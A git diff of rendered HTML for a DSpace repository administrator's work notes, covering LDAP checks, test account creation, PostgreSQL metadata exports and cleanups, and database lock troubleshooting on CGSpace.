                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap-account@cgiarad.org" -W "(sAMAccountName=someaccountnametocheck)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -Enter LDAP Password: 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap-account@cgiarad.org" -W "(sAMAccountName=someaccountnametocheck)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +Enter LDAP Password: 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I sent a message to CGNET to ask about the server settings and see if our IP is still whitelisted
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • It turns out that CGNET created a new Active Directory server (AZCGNEROOT3.cgiarad.org) and decomissioned the old one last week
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • @@ -361,8 +361,8 @@ ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • @@ -371,13 +371,13 @@ ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Run dspace cleanup -v process on CGSpace to clean up old bitstreams
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Export lists of authors, donors, and affiliations for Peter Ballantyne to clean up:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -COPY 80901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -COPY 1274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -COPY 8091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2021-09-23

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +COPY 80901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +COPY 1274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +COPY 8091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2021-09-23

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Peter sent me back the corrections for the affiliations
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -386,24 +386,24 @@ COPY 8091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ csvgrep -c 'correct' -m 'DELETE' /tmp/affiliations.csv > /tmp/affiliations-delete.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ csvgrep -c 'correct' -r '^.+$' /tmp/affiliations.csv | csvgrep -i -c 'correct' -m 'DELETE' > /tmp/affiliations-fix.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ csvgrep -c 'correct' -m 'DELETE' /tmp/affiliations.csv > /tmp/affiliations-delete.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ csvgrep -c 'correct' -r '^.+$' /tmp/affiliations.csv | csvgrep -i -c 'correct' -m 'DELETE' > /tmp/affiliations-fix.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then I updated the controlled vocabulary for affiliations by exporting the top 1,000 used terms:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c 1 /tmp/2021-09-23-affiliations.csv | sed 1d > /tmp/affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ csvcut -c 1 /tmp/2021-09-23-affiliations.csv | sed 1d > /tmp/affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Peter also sent me 310 corrections and 234 deletions for donors so I applied those and updated the controlled vocabularies too
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Move some One CGIAR-related collections around the CGSpace hierarchy for Peter Ballantyne
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Mohammed Salem asked me for an ID to UUID mapping for CGSpace collections, so I generated one similar to the ID one I sent him in 2020-11:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -COPY 1139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-09-24

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +COPY 1139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-09-24

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Peter and Abenet agreed that we should consider converting more of our UPPER CASE metadata values to Title Case
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -435,33 +435,33 @@ COPY 1139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -UPDATE 2903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.coverage.subregion" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -COPY 1200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +UPDATE 2903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.coverage.subregion" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +COPY 1200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Then I process the list for matches with my subdivision-lookup.py script, and extract only the values that matched:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvgrep -c matched -m 'true' /tmp/subregions.csv | csvcut -c 1 | sed 1d > /tmp/subregions-matched.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/subregions-matched.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -81 /tmp/subregions-matched.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvgrep -c matched -m 'true' /tmp/subregions.csv | csvcut -c 1 | sed 1d > /tmp/subregions-matched.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ wc -l /tmp/subregions-matched.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +81 /tmp/subregions-matched.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I updated the controlled vocabulary in the submission forms
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I did the same for dcterms.audience, taking special care to a few all-caps values:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != 'NGOS' AND text_value != 'CGIAR';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -localhost/dspace63= > UPDATE metadatavalue SET text_value='NGOs' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'NGOS';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != 'NGOS' AND text_value != 'CGIAR';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +localhost/dspace63= > UPDATE metadatavalue SET text_value='NGOs' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'NGOS';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Update submission form comment for DOIs because it was still recommending people use the “dx.doi.org” format even though I batch updated all DOIs to the “doi.org” format a few times in the last year
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Then I updated all existing metadata to the new format again:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-09-26

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2021-09-26

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Mohammed Salem told me last week that MELSpace and WorldFish have been upgraded to DSpace 6 so I updated the repository setup in AReS to use the UUID field instead of IDs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -489,26 +489,26 @@ UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvcut -c 'id,collection,dc.title[en_US]' ~/Downloads/10568-106990.csv > /tmp/2021-09-28-alliance-reports.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvcut -c 'id,collection,dc.title[en_US]' ~/Downloads/10568-106990.csv > /tmp/2021-09-28-alliance-reports.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • She sent it back fairly quickly with a new column marked “Move” so I extracted those items that matched and set them to the new owning collection:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvgrep -c Move -m 'Yes' ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed 's_10568/106990_10568/111506_' > /tmp/alliance-move.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ csvgrep -c Move -m 'Yes' ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed 's_10568/106990_10568/111506_' > /tmp/alliance-move.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Maria from the Alliance emailed us to say that approving submissions was slow on CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • I looked at the PostgreSQL activity and it seems low:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              postgres@linode18:~$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Locks look high though:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | sort | uniq -c | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -1154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | sort | uniq -c | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +1154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Indeed it seems something started causing locks to increase yesterday:

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PostgreSQL locks week

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -520,9 +520,9 @@ UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • The number of DSpace sessions is normal, hovering around 1,000…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Looking closer at the PostgreSQL activity log, I see the locks are all held by the dspaceCli user… which seem weird:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -1096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  postgres@linode18:~$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +1096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Now I’m wondering why there are no connections from dspaceApi or dspaceWeb. Could it be that our Tomcat JDBC pooling via JNDI isn’t working?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I see the same thing on DSpace Test hmmmm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -536,14 +536,14 @@ UPDATE 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Export a list of ILRI subjects from CGSpace to validate against AGROVOC for Peter and Abenet:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -COPY 149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +COPY 149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then validate and format the matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -$ csvcut -c subject,'match type' /tmp/2021-09-29-ilri-subjects.csv | sed -e 's/match type/matched/' -e 's/\(alt\|pref\)Label/yes/' > /tmp/2021-09-29-ilri-subjects2.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ csvcut -c subject,'match type' /tmp/2021-09-29-ilri-subjects.csv | sed -e 's/match type/matched/' -e 's/\(alt\|pref\)Label/yes/' > /tmp/2021-09-29-ilri-subjects2.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I talked to Salem about depositing from MEL to CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • He mentioned that the one issue is that when you deposit to a workflow you don’t get a Handle or any kind of identifier back!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • diff --git a/docs/2021-10/index.html b/docs/2021-10/index.html index a7e74538a..8b9992649 100644 --- a/docs/2021-10/index.html +++ b/docs/2021-10/index.html @@ -46,7 +46,7 @@ $ wc -l /tmp/2021-10-01-affiliations.txt So we have 1879/7100 (26.46%) matching already "/> - + @@ -136,15 +136,15 @@ So we have 1879/7100 (26.46%) matching already
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Export all affiliations on CGSpace and run them against the latest RoR data dump:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
